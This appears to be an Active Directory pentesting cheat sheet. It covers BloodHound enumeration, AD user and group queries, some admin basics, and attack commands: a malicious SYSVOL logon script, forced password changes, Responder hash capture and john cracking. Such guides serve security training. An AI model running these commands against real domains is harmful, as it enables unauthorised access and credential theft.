# Active Directory Pentesting

Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks.

### Enumeration <a href="#enumeration" id="enumeration"></a>

#### Domain Controllers Discovery <a href="#domain-controllers-discovery" id="domain-controllers-discovery"></a>

```
dig @<target-ip> example.local ANY
gobuster dns -d example.local -w subdomains.txt -t 25
```

### Enumeration with BloodHound <a href="#enumeration-with-bloodhound" id="enumeration-with-bloodhound"></a>

#### 1. Run BloodHound <a href="#id-1-run-bloodhound" id="id-1-run-bloodhound"></a>

We use [BloodHound Community Edition](https://github.com/SpecterOps/BloodHound).\
The following command starts the Docker Compose of the BloodHound.

```
curl -L https://ghst.ly/getbhce > docker-compose.yml
sudo docker-compose down -v # If you want to reset the password of BloodHound...
sudo docker-compose pull && sudo docker-compose up
```

After that, we can use the web UI by accessing to `localhost:8080` in web browser.\
Login with the username `admin` and the password which is displayed the log when executing the above command.

To specify arbitrary ip and port, set the environment variables on our attack machine:

```
export BLOODHOUND_HOST=10.0.0.1
export BLOODHOUND_PORT=8090
```

#### 2. Collect Data <a href="#id-2-collect-data" id="id-2-collect-data"></a>

* **Option1. Using NetExec**

  If you already have `NetExec` in your machine, I think it is the most easiest way.

  ```
  netexec ldap <target-ip> -d example.local -u username -p password --dns-server <target-ip> --bloodhound -c All
  ```
* **Option2. Using BloodHound.py**

  We can also use [BloodHound.py](https://github.com/dirkjanm/BloodHound.py).\
  Install it as follow:

  ```
  python3 -m venv .venv
  source .venv/bin/activate
  pipx install bloodhound # or using 'pip3' instead of 'pipx'
  bloodhound-python -h
  ```

  Then collect data:

  ```
  # -d: Domain
  # -u: Username
  # -p: Password
  # -dc: Domain Controller
  # -c all: Collect all data
  # -ns: Alternate the nameserver
  bloodhound-python -d example.local -u username -p password -dc dc.example.local -c all -ns ns.example.local

  # If we cannot resolve the domain, try dnschef (https://github.com/iphelix/dnschef) to create a fake DNS by proxy.
  sudo python3 dnschef.py --fakeip <target-ip> --nameserver <target-ip>
  ```

#### 3. Upload Collected Data <a href="#id-3-upload-collected-data" id="id-3-upload-collected-data"></a>

After running, the result files (`*.json`) generated in the current directory. Upload all these JSON files to the BloodHound in web browser.

We can explore the relationship in the Active Directory.

### Investigation <a href="#investigation" id="investigation"></a>

```
# List all users
net user /domain
net user <username> /domain
Get-ADUser -Filter *
Get-ADUser -Identity <username> -Server dc.example.com -Properties *
Get-ADUser -Filter 'Name -like "*michael"' -Server dc.example.com | Format-Table Name,SamAccountName -A

# List all groups
net group /domain
net group "<group>" /domain
PS> Get-ADGroup -Identity <group> -Server dc.example.com -Properties *
PS> Get-ADGroupMember -Identity <group> -Server dc.example.com

# List the password policy
net accounts /domain

# List AD objects
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server dc.example.com

# Retrieve information about the given domain.
Get-ADDomain -Server dc.example.com

# Change the password of AD user
Set-ADAccountPassword -Identity <username> -Server dc.example.com  -OldPassword (ConvertTo-SecureString -AsPlaintext "oldpass" -force) -NewPassword (ConvertTo-SecureString -AsPlaintext "newpass" -force)

# SYSVOL - A shared folder storing the Group Policy Objects (GPOs).
dir \\dc.example.com\SYSVOL\
```

### Abuse Logon Script for Other Users <a href="#abuse-logon-script-for-other-users" id="abuse-logon-script-for-other-users"></a>

If the current user has the permission to write scripts in SYSVOL, we may be able to change other users logon script path.

```
# 1. Check the permission
icacls C:\Windows\SYSVOL\sysvol\example.local\scripts\

# 2. Modify/Add a malicious script
'powershell -e <BASE64_COMMAND>' | OutFile -FilePath C:\Windows\SYSVOL\sysvol\example.local\scripts\evil.bat

# 3. Set logon script for the specified user
Set-ADUser -Identity VictimUser -ScriptPath '\\example.local\SYSVOL\example.local\scripts\evil.bat
```

When the other user logs on, the `.bat` script will be executed.

### Force Change Password Attack <a href="#force-change-password-attack" id="force-change-password-attack"></a>

If we found some username/password, and other usernames, we might be able to change other user passwords. The user needs to have **GenericAll** permission to change passwords of other users.

```
# -U: User credential who has the permission to change another user password
# -I: Target IP
# -S: Target server name
net rpc password "TargetUserName" "myPassw0rd@123" -U "UserName"%"Password" -I "10.0.0.1" -S "EXAMPLE.LOCAL"
```

### Microsoft Management Console (mmc) <a href="#microsoft-management-console-mmc" id="microsoft-management-console-mmc"></a>

To setup AD, follow this instructions:

1. Right-click on the Windows icon.
2. Click **"Run"** and enter **"mmc"** then click **"OK"**.
3. In the MMC, click **"File → Add or Remove Snap-ins"**.
4. Add all three **"Active Directory…"** snap-ins.
5. Right-click on the **"Active Directory…"** in the left pane and select **"Change Forest"**.
6. Enter the domain as the Root domain and click OK.
7. Click on **"View → Advanced Features"**.

### Naming Convention <a href="#naming-convention" id="naming-convention"></a>

If we found usernames list in Active Directory, we can modify usernames with naming convention.\
For instance,

```
john smith   -> jsmith, j.smith, john.smith
michael pole -> mpole, m.pole, michael.pole
```

### SSH Login with AD Credentials <a href="#ssh-login-with-a-d-credentials" id="ssh-login-with-a-d-credentials"></a>

```
ssh dc.example.com\\<ad_username>@sub.dc.example.com
```

### Inject Credentials into Memory <a href="#inject-credentials-into-memory" id="inject-credentials-into-memory"></a>

```
# /netonly: All network communications will use these injected credentials for authentication.
runas.exe /netonly /user:<domain>\<username> cmd.exe
```

### DNS Configuration <a href="#dns-configuration" id="dns-configuration"></a>

```
# PowerShell
$dnsip = "<DC_IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
```

Now check if the configuration is set correctly.

```
nslookup dc.example.com
```

### Basic Knowledge <a href="#basic-knowledge" id="basic-knowledge"></a>

#### User Management <a href="#user-management" id="user-management"></a>

* **Delegation**

  In Active Directory, the administrator delegate another user to manage users over an Organizational Unit (OU), without the admin privileges.

  1. Setup
     1. Open "Active Directory Users and Computers".
     2. Right-click on the target OU, and click “Deligate Control…”. Then the new window will open.
     3. In the window, input username who you want to delegate the privilege that manage users.
     4. Select tasks to which the delegated user should manage.
     5. Click OK.
  2. Manage Users
     1. Logon as the delegated user.
     2. For instance, if you want to reset the john's password, execute the following command in PowerShell. Then input new password in prompt.

        ```
        Set-ADAccountPassword john -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
        ```
     3. The first time John logs on after that, we want John to change his arbitrary password not the password you entered. So that to, execute the following command.

        ```
        Set-ADUser -ChangePasswordAtLogon $true -Identity john -Verbose
        ```
     4. Now when John logs on he will be prompt to change a new password.

### Intercept NetNTLM Authentication <a href="#intercept-netntlm-authentication" id="intercept-netntlm-authentication"></a>

Start Responder to listen for any LLMNR, NBT-NS, WPAD requests.

```
sudo responder -I <interface-like-eth0>
```

Leave Responder running until receiving some requests.\
If you get NTLM hash, crack it in local machine.

```
echo -n '<copied-NTLM-hash>' > hash.txt
john --format=netntlmv2 --wordlist=wordlist.txt hash.txt
```

### References <a href="#references" id="references"></a>

* [TryHackMe](https://tryhackme.com/room/adenumeration)
* [S1ckB0y1337](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet)